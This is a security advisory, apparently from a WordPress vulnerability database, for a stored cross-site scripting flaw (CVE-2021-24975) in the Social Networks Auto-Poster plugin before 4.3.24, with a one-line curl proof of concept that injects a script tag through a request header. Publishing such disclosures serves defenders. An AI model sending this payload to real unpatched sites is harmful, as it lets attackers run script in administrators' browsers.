NextScripts: Social Networks Auto-Poster < 4.3.24 – Unauthenticated Stored XSS | CVE 2021-24975 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape logged requests before outputting them in the related admin dashboard, leading to an Unauthenticated Stored Cross-Site Scripting issue

Proof of Concept

curl -H 'x-tomato: <script>alert(/XSS/);</script>' 'https://example.com/?nxs-cronrun=yes'

The XSS will be triggered in the Log/History dashboard (/wp-admin/admin.php?page=nxs-log)

Affects Plugins

social-networks-auto-poster-facebook-twitter-g

Fixed in 4.3.24

References

CVE

URL

https://plugins.trac.wordpress.org/changeset/2650138

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

b99dae3d-8230-4427-adc5-4ef9cbfb8ba1

Timeline

Publicly Published

2022-01-03 (about 2 years ago)

Added

2022-01-03 (about 2 years ago)

Last Updated

2022-04-08 (about 2 years ago)

Other

Published

Title

Published

2022-07-26

Title

Feed Them Social < 3.0.1 - Reflected Cross-Site Scripting

Published

2015-04-07

Title

WP Super Cache < 1.4.3 - Stored Cross-Site Scripting (XSS)

Published

2023-02-13

Title

Product GTIN (EAN, UPC, ISBN) for WooCommerce <= 1.1.1 - Contributor+ Stored XSS

Published

2015-08-20

Title

WP Database Backup <= 3.3 - Authenticated Stored Cross-Site Scripting (XSS)

Published

2022-01-12

Title

Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue < 3.1.31 - Reflected Cross-Site Scripting